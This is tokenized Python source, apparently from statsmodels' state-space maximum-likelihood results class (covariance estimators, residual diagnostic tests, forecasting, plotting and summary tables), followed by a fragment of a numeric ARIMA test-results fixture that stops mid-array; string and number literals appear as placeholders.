singular_values ) ) <EOL> return - neg_cov <EOL> @ cache_readonly <EOL> def cov_params_approx ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_approx ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> def _cov_params_oim ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> cov_params , singular_values = pinv_extended ( <EOL> nobs * self . model . observed_information_matrix ( <EOL> self . params , transformed = True , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> ) <EOL> self . model . update ( self . params ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . matrix_rank ( np . diag ( singular_values ) ) <EOL> return cov_params <EOL> @ cache_readonly <EOL> def cov_params_oim ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_oim ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> def _cov_params_opg ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> cov_params , singular_values = pinv_extended ( <EOL> nobs * self . model . opg_information_matrix ( <EOL> self . params , transformed = True , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> ) <EOL> self . model . update ( self . params ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . matrix_rank ( np . diag ( singular_values ) ) <EOL> return cov_params <EOL> @ cache_readonly <EOL> def cov_params_opg ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_opg ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> @ cache_readonly <EOL> def cov_params_robust ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . cov_params_robust_oim <EOL> def _cov_params_robust_oim ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> cov_opg = self . _cov_params_opg ( approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> evaluated_hessian = ( <EOL> nobs * self . model . observed_information_matrix ( <EOL> self . params , transformed = True , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> ) <EOL> self . model . update ( self . params ) <EOL> cov_params , singular_values = pinv_extended ( <EOL> np . dot ( np . dot ( evaluated_hessian , cov_opg ) , evaluated_hessian ) <EOL> ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . matrix_rank ( np . diag ( singular_values ) ) <EOL> return cov_params <EOL> @ cache_readonly <EOL> def cov_params_robust_oim ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_robust_oim ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> def _cov_params_robust_approx ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> cov_opg = self . _cov_params_opg ( approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> if approx_complex_step : <EOL> evaluated_hessian = nobs * self . model . _hessian_complex_step ( <EOL> self . params , transformed = True <EOL> ) <EOL> else : <EOL> evaluated_hessian = nobs * self . model . _hessian_finite_difference ( <EOL> self . params , transformed = True , <EOL> approx_centered = approx_centered <EOL> ) <EOL> self . model . update ( self . params ) <EOL> cov_params , singular_values = pinv_extended ( <EOL> np . dot ( np . dot ( evaluated_hessian , cov_opg ) , evaluated_hessian ) <EOL> ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . matrix_rank ( np . diag ( singular_values ) ) <EOL> return cov_params <EOL> @ cache_readonly <EOL> def cov_params_robust_approx ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_robust_approx ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> @ cache_readonly <EOL> def fittedvalues ( self ) : <EOL> """<STR_LIT>""" <EOL> fittedvalues = self . filter_results . forecasts <EOL> if fittedvalues . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> fittedvalues = fittedvalues [ <NUM_LIT:0> , : ] <EOL> else : <EOL> fittedvalues = fittedvalues . T <EOL> return fittedvalues <EOL> @ cache_readonly <EOL> def hqic ( self ) : <EOL> """<STR_LIT>""" <EOL> return hqic ( self . llf , self . nobs , self . params . shape [ <NUM_LIT:0> ] ) <EOL> @ cache_readonly <EOL> def llf_obs ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . model . loglikeobs ( self . params ) <EOL> @ cache_readonly <EOL> def llf ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . llf_obs [ self . filter_results . loglikelihood_burn : ] . sum ( ) <EOL> @ cache_readonly <EOL> def loglikelihood_burn ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . filter_results . loglikelihood_burn <EOL> @ cache_readonly <EOL> def pvalues ( self ) : <EOL> """<STR_LIT>""" <EOL> return norm . sf ( np . abs ( self . zvalues ) ) * <NUM_LIT:2> <EOL> @ cache_readonly <EOL> def resid ( self ) : <EOL> """<STR_LIT>""" <EOL> resid = self . filter_results . forecasts_error <EOL> if resid . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> resid = resid [ <NUM_LIT:0> , : ] <EOL> else : <EOL> resid = resid . T <EOL> return resid <EOL> @ cache_readonly <EOL> def zvalues ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . params / self . bse <EOL> def test_normality ( self , method ) : <EOL> """<STR_LIT>""" <EOL> if method is None : <EOL> method = '<STR_LIT>' <EOL> if method == '<STR_LIT>' : <EOL> from statsmodels . stats . stattools import jarque_bera <EOL> d = self . loglikelihood_burn <EOL> output = [ ] <EOL> for i in range ( self . model . k_endog ) : <EOL> resid = self . filter_results . standardized_forecasts_error [ i , d : ] <EOL> mask = ~ np . isnan ( resid ) <EOL> output . append ( jarque_bera ( resid [ mask ] ) ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> return np . array ( output ) <EOL> def test_heteroskedasticity ( self , method , alternative = '<STR_LIT>' , <EOL> use_f = True ) : <EOL> r"""<STR_LIT>""" <EOL> if method is None : <EOL> method = '<STR_LIT>' <EOL> if method == '<STR_LIT>' : <EOL> squared_resid = self . filter_results . standardized_forecasts_error ** <NUM_LIT:2> <EOL> d = self . loglikelihood_burn <EOL> test_statistics = [ ] <EOL> p_values = [ ] <EOL> for i in range ( self . model . k_endog ) : <EOL> h = int ( np . round ( ( self . nobs - d ) / <NUM_LIT:3> ) ) <EOL> numer_resid = squared_resid [ i , - h : ] <EOL> numer_resid = numer_resid [ ~ np . isnan ( numer_resid ) ] <EOL> numer_dof = len ( numer_resid ) <EOL> denom_resid = squared_resid [ i , d : d + h ] <EOL> denom_resid = denom_resid [ ~ np . isnan ( denom_resid ) ] <EOL> denom_dof = len ( denom_resid ) <EOL> if numer_dof < <NUM_LIT:2> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if denom_dof < <NUM_LIT:2> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> test_statistic = np . sum ( numer_resid ) / np . sum ( denom_resid ) <EOL> if use_f : <EOL> from scipy . stats import f <EOL> pval_lower = lambda test_statistics : f . cdf ( <EOL> test_statistics , numer_dof , denom_dof ) <EOL> pval_upper = lambda test_statistics : f . sf ( <EOL> test_statistics , numer_dof , denom_dof ) <EOL> else : <EOL> from scipy . stats import chi2 <EOL> pval_lower = lambda test_statistics : chi2 . cdf ( <EOL> numer_dof * test_statistics , denom_dof ) <EOL> pval_upper = lambda test_statistics : chi2 . sf ( <EOL> numer_dof * test_statistics , denom_dof ) <EOL> alternative = alternative . lower ( ) <EOL> if alternative in [ '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> p_value = pval_upper ( test_statistic ) <EOL> elif alternative in [ '<STR_LIT:d>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> test_statistic = <NUM_LIT:1.> / test_statistic <EOL> p_value = pval_upper ( test_statistic ) <EOL> elif alternative in [ '<STR_LIT:2>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> p_value = <NUM_LIT:2> * np . minimum ( <EOL> pval_lower ( test_statistic ) , <EOL> pval_upper ( test_statistic ) <EOL> ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> test_statistics . append ( test_statistic ) <EOL> p_values . append ( p_value ) <EOL> output = np . c_ [ test_statistics , p_values ] <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return output <EOL> def test_serial_correlation ( self , method , lags = None ) : <EOL> """<STR_LIT>""" <EOL> if method is None : <EOL> method = '<STR_LIT>' <EOL> if method == '<STR_LIT>' or method == '<STR_LIT>' : <EOL> from statsmodels . stats . diagnostic import acorr_ljungbox <EOL> d = self . loglikelihood_burn <EOL> output = [ ] <EOL> if lags is None : <EOL> lags = min ( <NUM_LIT> , self . nobs - d - <NUM_LIT:1> ) <EOL> for i in range ( self . model . k_endog ) : <EOL> results = acorr_ljungbox ( <EOL> self . filter_results . standardized_forecasts_error [ i ] [ d : ] , <EOL> lags = lags , boxpierce = ( method == '<STR_LIT>' ) ) <EOL> if method == '<STR_LIT>' : <EOL> output . append ( results [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> else : <EOL> output . append ( results [ <NUM_LIT:2> : ] ) <EOL> output = np . c_ [ output ] <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return output <EOL> def get_prediction ( self , start = None , end = None , dynamic = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> start = self . model . _get_predict_start ( start ) <EOL> end , out_of_sample = self . model . _get_predict_end ( end ) <EOL> dates = self . data . dates <EOL> if isinstance ( dynamic , str ) : <EOL> if dates is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> dtdynamic = self . model . _str_to_date ( dynamic ) <EOL> try : <EOL> dynamic_start = self . model . _get_dates_loc ( dates , dtdynamic ) <EOL> dynamic = dynamic_start - start <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( str ( dynamic ) , str ( dtdynamic ) ) ) <EOL> prediction_results = self . filter_results . predict ( <EOL> start , end + out_of_sample + <NUM_LIT:1> , dynamic , ** kwargs <EOL> ) <EOL> if self . data . dates is None : <EOL> row_labels = self . data . row_labels <EOL> else : <EOL> row_labels = self . data . predict_dates <EOL> return PredictionResultsWrapper ( <EOL> PredictionResults ( self , prediction_results , row_labels = row_labels ) ) <EOL> def get_forecast ( self , steps = <NUM_LIT:1> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( steps , int ) : <EOL> end = self . nobs + steps - <NUM_LIT:1> <EOL> else : <EOL> end = steps <EOL> return self . get_prediction ( start = self . nobs , end = end , ** kwargs ) <EOL> def predict ( self , start = None , end = None , dynamic = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> prediction_results = self . get_prediction ( start , end , dynamic , ** kwargs ) <EOL> return prediction_results . predicted_mean <EOL> def forecast ( self , steps = <NUM_LIT:1> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( steps , int ) : <EOL> end = self . nobs + steps - <NUM_LIT:1> <EOL> else : <EOL> end = steps <EOL> return self . predict ( start = self . nobs , end = end , ** kwargs ) <EOL> def simulate ( self , nsimulations , measurement_shocks = None , <EOL> state_shocks = None , initial_state = None ) : <EOL> """<STR_LIT>""" <EOL> return self . model . simulate ( self . params , nsimulations , <EOL> measurement_shocks , state_shocks , <EOL> initial_state ) <EOL> def impulse_responses ( self , steps = <NUM_LIT:1> , impulse = <NUM_LIT:0> , orthogonalized = False , <EOL> cumulative = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . model . impulse_responses ( self . params , steps , impulse , <EOL> orthogonalized , cumulative , <EOL> ** kwargs ) <EOL> def plot_diagnostics ( self , variable = <NUM_LIT:0> , lags = <NUM_LIT:10> , fig = None , figsize = None ) : <EOL> """<STR_LIT>""" <EOL> from statsmodels . graphics . utils import _import_mpl , create_mpl_fig <EOL> _import_mpl ( ) <EOL> fig = create_mpl_fig ( fig , figsize ) <EOL> d = self . loglikelihood_burn <EOL> resid = self . filter_results . standardized_forecasts_error [ variable , d : ] <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> if hasattr ( self . data , '<STR_LIT>' ) and self . data . dates is not None : <EOL> x = self . data . dates [ self . loglikelihood_burn : ] . _mpl_repr ( ) <EOL> else : <EOL> x = np . arange ( len ( resid ) ) <EOL> ax . plot ( x , resid ) <EOL> ax . hlines ( <NUM_LIT:0> , x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , alpha = <NUM_LIT:0.5> ) <EOL> ax . set_xlim ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] ) <EOL> ax . set_title ( '<STR_LIT>' ) <EOL> resid_nonmissing = resid [ ~ ( np . isnan ( resid ) ) ] <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . hist ( resid_nonmissing , normed = True , label = '<STR_LIT>' ) <EOL> from scipy . stats import gaussian_kde , norm <EOL> kde = gaussian_kde ( resid_nonmissing ) <EOL> xlim = ( - <NUM_LIT> * <NUM_LIT:2> , <NUM_LIT> * <NUM_LIT:2> ) <EOL> x = np . linspace ( xlim [ <NUM_LIT:0> ] , xlim [ <NUM_LIT:1> ] ) <EOL> ax . plot ( x , kde ( x ) , label = '<STR_LIT>' ) <EOL> ax . plot ( x , norm . pdf ( x ) , label = '<STR_LIT>' ) <EOL> ax . set_xlim ( xlim ) <EOL> ax . legend ( ) <EOL> ax . set_title ( '<STR_LIT>' ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> from statsmodels . graphics . gofplots import qqplot <EOL> qqplot ( resid , line = '<STR_LIT:s>' , ax = ax ) <EOL> ax . set_title ( '<STR_LIT>' ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> from statsmodels . graphics . tsaplots import plot_acf <EOL> plot_acf ( resid , ax = ax , lags = lags ) <EOL> ax . set_title ( '<STR_LIT>' ) <EOL> ax . set_ylim ( - <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> return fig <EOL> def summary ( self , alpha = <NUM_LIT> , start = None , title = None , model_name = None , <EOL> display_params = True ) : <EOL> """<STR_LIT>""" <EOL> from statsmodels . iolib . summary import Summary <EOL> model = self . model <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> if self . data . dates is not None : <EOL> dates = self . data . dates <EOL> d = dates [ start ] <EOL> sample = [ '<STR_LIT>' % ( d . month , d . day , d . year ) ] <EOL> d = dates [ - <NUM_LIT:1> ] <EOL> sample += [ '<STR_LIT>' + '<STR_LIT>' % ( d . month , d . day , d . year ) ] <EOL> else : <EOL> sample = [ str ( start ) , '<STR_LIT>' + str ( self . model . nobs ) ] <EOL> if model_name is None : <EOL> model_name = model . __class__ . __name__ <EOL> het = self . test_heteroskedasticity ( method = '<STR_LIT>' ) <EOL> lb = self . test_serial_correlation ( method = '<STR_LIT>' ) <EOL> jb = self . test_normality ( method = '<STR_LIT>' ) <EOL> if not isinstance ( model_name , list ) : <EOL> model_name = [ model_name ] <EOL> top_left = [ ( '<STR_LIT>' , None ) ] <EOL> top_left . append ( ( '<STR_LIT>' , [ model_name [ <NUM_LIT:0> ] ] ) ) <EOL> for i in range ( <NUM_LIT:1> , len ( model_name ) ) : <EOL> top_left . append ( ( '<STR_LIT>' , [ '<STR_LIT>' + model_name [ i ] ] ) ) <EOL> top_left += [ <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , [ sample [ <NUM_LIT:0> ] ] ) , <EOL> ( '<STR_LIT>' , [ sample [ <NUM_LIT:1> ] ] ) <EOL> ] <EOL> top_right = [ <EOL> ( '<STR_LIT>' , [ self . model . nobs ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . llf ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . aic ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . bic ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . hqic ] ) <EOL> ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> top_left . append ( ( '<STR_LIT>' , [ self . cov_type ] ) ) <EOL> format_str = lambda array : [ <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' . format ( i ) for i in array ] ) <EOL> ] <EOL> diagn_left = [ ( '<STR_LIT>' , format_str ( lb [ : , <NUM_LIT:0> , - <NUM_LIT:1> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( lb [ : , <NUM_LIT:1> , - <NUM_LIT:1> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( het [ : , <NUM_LIT:0> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( het [ : , <NUM_LIT:1> ] ) ) <EOL> ] <EOL> diagn_right = [ ( '<STR_LIT>' , format_str ( jb [ : , <NUM_LIT:0> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( jb [ : , <NUM_LIT:1> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( jb [ : , <NUM_LIT:2> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( jb [ : , <NUM_LIT:3> ] ) ) <EOL> ] <EOL> summary = Summary ( ) <EOL> summary . add_table_2cols ( self , gleft = top_left , gright = top_right , <EOL> title = title ) <EOL> if len ( self . params ) > <NUM_LIT:0> and display_params : <EOL> summary . add_table_params ( self , alpha = alpha , <EOL> xname = self . data . param_names , use_t = False ) <EOL> summary . add_table_2cols ( self , gleft = diagn_left , gright = diagn_right , <EOL> title = "<STR_LIT>" ) <EOL> etext = [ ] <EOL> if hasattr ( self , '<STR_LIT>' ) and '<STR_LIT:description>' in self . cov_kwds : <EOL> etext . append ( self . cov_kwds [ '<STR_LIT:description>' ] ) <EOL> if self . _rank < len ( self . params ) : <EOL> etext . append ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % np . linalg . cond ( self . cov_params ( ) ) ) <EOL> if etext : <EOL> etext = [ "<STR_LIT>" . format ( i + <NUM_LIT:1> , text ) <EOL> for i , text in enumerate ( etext ) ] <EOL> etext . insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> summary . add_extra_txt ( etext ) <EOL> return summary <EOL> class MLEResultsWrapper ( wrap . ResultsWrapper ) : <EOL> _attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _wrap_attrs = wrap . union_dicts ( tsbase . TimeSeriesResultsWrapper . _wrap_attrs , <EOL> _attrs ) <EOL> _methods = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> _wrap_methods = wrap . union_dicts ( <EOL> tsbase . TimeSeriesResultsWrapper . _wrap_methods , _methods ) <EOL> wrap . populate_wrapper ( MLEResultsWrapper , MLEResults ) <EOL> class PredictionResults ( pred . PredictionResults ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , prediction_results , row_labels = None ) : <EOL> if model . model . k_endog == <NUM_LIT:1> : <EOL> endog = pd . Series ( prediction_results . endog [ : , <NUM_LIT:0> ] , <EOL> name = model . model . endog_names ) <EOL> else : <EOL> endog = pd . DataFrame ( prediction_results . endog . T , <EOL> columns = model . model . endog_names ) <EOL> self . model = Bunch ( data = model . data . __class__ ( <EOL> endog = endog , <EOL> predict_dates = getattr ( model . data , '<STR_LIT>' , None ) ) , <EOL> ) <EOL> self . prediction_results = prediction_results <EOL> predicted_mean = self . prediction_results . forecasts <EOL> if predicted_mean . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> predicted_mean = predicted_mean [ <NUM_LIT:0> , : ] <EOL> else : <EOL> predicted_mean = predicted_mean . transpose ( ) <EOL> var_pred_mean = self . prediction_results . forecasts_error_cov <EOL> if var_pred_mean . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> var_pred_mean = var_pred_mean [ <NUM_LIT:0> , <NUM_LIT:0> , : ] <EOL> else : <EOL> var_pred_mean = var_pred_mean . transpose ( ) <EOL> super ( PredictionResults , self ) . __init__ ( predicted_mean , var_pred_mean , <EOL> dist = '<STR_LIT>' , <EOL> row_labels = row_labels , <EOL> link = identity ( ) ) <EOL> @ property <EOL> def se_mean ( self ) : <EOL> if self . var_pred_mean . ndim == <NUM_LIT:1> : <EOL> se_mean = np . sqrt ( self . var_pred_mean ) <EOL> else : <EOL> se_mean = np . sqrt ( self . var_pred_mean . T . diagonal ( ) ) <EOL> return se_mean <EOL> def conf_int ( self , method = '<STR_LIT>' , alpha = <NUM_LIT> , ** kwds ) : <EOL> conf_int = super ( PredictionResults , self ) . conf_int ( <EOL> method , alpha , ** kwds ) <EOL> if self . model . data . predict_dates is not None : <EOL> conf_int = pd . DataFrame ( conf_int , <EOL> index = self . model . data . predict_dates ) <EOL> else : <EOL> conf_int = pd . DataFrame ( conf_int ) <EOL> ynames = self . model . data . ynames <EOL> if not type ( ynames ) == list : <EOL> ynames = [ ynames ] <EOL> names = ( [ '<STR_LIT>' % name for name in ynames ] + <EOL> [ '<STR_LIT>' % name for name in ynames ] ) <EOL> conf_int . columns = names <EOL> return conf_int <EOL> def summary_frame ( self , endog = <NUM_LIT:0> , what = '<STR_LIT:all>' , alpha = <NUM_LIT> ) : <EOL> from statsmodels . compat . collections import OrderedDict <EOL> ci_mean = self . conf_int ( alpha = alpha ) . values <EOL> to_include = OrderedDict ( ) <EOL> if self . predicted_mean . ndim == <NUM_LIT:1> : <EOL> yname = self . model . data . ynames <EOL> to_include [ '<STR_LIT>' ] = self . predicted_mean <EOL> to_include [ '<STR_LIT>' ] = self . se_mean <EOL> k_endog = <NUM_LIT:1> <EOL> else : <EOL> yname = self . model . data . ynames [ endog ] <EOL> to_include [ '<STR_LIT>' ] = self . predicted_mean [ : , endog ] <EOL> to_include [ '<STR_LIT>' ] = self . se_mean [ : , endog ] <EOL> k_endog = self . predicted_mean . shape [ <NUM_LIT:1> ] <EOL> to_include [ '<STR_LIT>' ] = ci_mean [ : , endog ] <EOL> to_include [ '<STR_LIT>' ] = ci_mean [ : , k_endog + endog ] <EOL> self . table = to_include <EOL> res = pd . DataFrame ( to_include , index = self . row_labels , <EOL> columns = to_include . keys ( ) ) <EOL> res . columns . name = yname <EOL> return res <EOL> class PredictionResultsWrapper ( wrap . ResultsWrapper ) : <EOL> _attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _wrap_attrs = wrap . union_dicts ( _attrs ) <EOL> _methods = { } <EOL> _wrap_methods = wrap . union_dicts ( _methods ) <EOL> wrap . populate_wrapper ( PredictionResultsWrapper , PredictionResults ) </s>
<s> import numpy as np <EOL> llf = np . array ( [ - <NUM_LIT> ] ) <EOL> nobs = np . array ( [ <NUM_LIT> ] ) <EOL> k = np . array ( [ <NUM_LIT:4> ] ) <EOL> k_exog = np . array ( [ <NUM_LIT:1> ] ) <EOL> sigma = np . array ( [ <NUM_LIT> ] ) <EOL> chi2 = np . array ( [ <NUM_LIT> ] ) <EOL> df_model = np . array ( [ <NUM_LIT:3> ] ) <EOL> k_ar = np . array ( [ <NUM_LIT:1> ] ) <EOL> k_ma = np . array ( [ <NUM_LIT:2> ] ) <EOL> params = np . array ( [ <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> cov_params = np . array ( [ <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> xb = np . array ( [ <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> 